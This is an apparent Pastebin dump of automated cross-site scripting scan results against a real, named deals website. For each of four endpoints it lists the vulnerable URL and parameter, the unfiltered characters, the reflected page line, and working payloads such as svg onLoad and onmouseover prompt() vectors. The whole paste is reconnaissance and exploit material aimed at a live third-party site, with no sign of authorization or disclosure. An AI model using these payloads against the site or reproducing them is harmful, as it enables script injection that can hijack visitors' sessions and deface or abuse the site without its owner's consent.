Chigs34

Untitled

Jul 5th, 2020
22
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.91 KB | None | 0 0
  1.  
  2. URL: https://www.dealsplus.com/tag/wifi-router
  3. response URL: https://www.dealsplus.com/search?keyword=x" onmouseover=prompt(9) "
  4. POST url: https://www.dealsplus.com/search
  5. Unfiltered: '"(){}:/;
  6. Payload: 1zqjgc'"(){}<x>:/1zqjgc;9
  7. Type: form
  8. Injection point: keyword
  9. Possible payloads: x"/onmouseover=prompt(9)/", x" onmouseover=prompt(9) "
  10. Line: <meta name="description" content="find the best deals for 1zqjgc'"(){}:/1zqjgc;9
  11.  
  12. URL: https://www.dealsplus.com/coupon
  13. response URL: https://www.dealsplus.com/coupon/x"><svG onLoad=prompt(9)>
  14. Unfiltered: '"(){}<x>:;
  15. Payload: 1zqjnn'"(){}<x>:1zqjnn;9
  16. Type: url
  17. Injection point: end of url
  18. Possible payloads: x"/onmouseover=prompt(9)/", x"><svG onLoad=prompt(9)>, x" onmouseover=prompt(9) "
  19. Line: <html data-path="/coupon/1zqjnn'"(){}<x>:1zqjnn;9
  20.  
  21. URL: https://www.dealsplus.com/go/rd?u1=amazon.com&u2=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB073HP1JVY%2Fref%3Dox_sc_act_title_1%3Fsmid%3DATVPDKIKX0DER&sid=1D3D4zfn8D1D3D1D0D0D0D0&m=ATVPDKIKX0DER
  22. response URL: https://www.dealsplus.com/go/rd?u1=amazon.com&u2=1zqjbh'%22()%7B%7D%3Cx%3E:/1zqjbh;9&sid=1D3D4zfn8D1D3D1D0D0D0D0&m=ATVPDKIKX0DER
  23. Unfiltered: '(){}<x>:/;
  24. Payload: 1zqjbh'"(){}<x>:/1zqjbh;9
  25. Type: url
  26. Injection point: u2
  27. Possible payloads: </SCript><svG/onLoad=prompt(9)>
  28. Line: <script type="text/javascript">
  29. settimeout(gourl, 2000);
  30.  
  31. function gourl() {
  32. window.location.replace("1zqjbh'%22(){}<x>:/1zqjbh;9
  33.  
  34. URL: https://www.dealsplus.com/blackfriday/deals/tvs
  35. response URL: https://www.dealsplus.com/blackfriday/search?q=1zqjjv%27%22%28%29%7B%7D%3Cx%3E%3A%2F1zqjjv%3B9
  36. POST url: https://www.dealsplus.com/blackfriday/search
  37. Unfiltered: '(){}<x>:/;
  38. Payload: 1zqjjv'"(){}<x>:/1zqjjv;9
  39. Type: form
  40. Injection point: q
  41. Possible payloads: </SCript><svG/onLoad=prompt(9)>
  42. Line: <script type="text/javascript">
  43. bfa.logevent("search results viewed", {"query":"1zqjjv'\"(){}<x>:/1zqjjv;9
Add Comment
Please, Sign In to add comment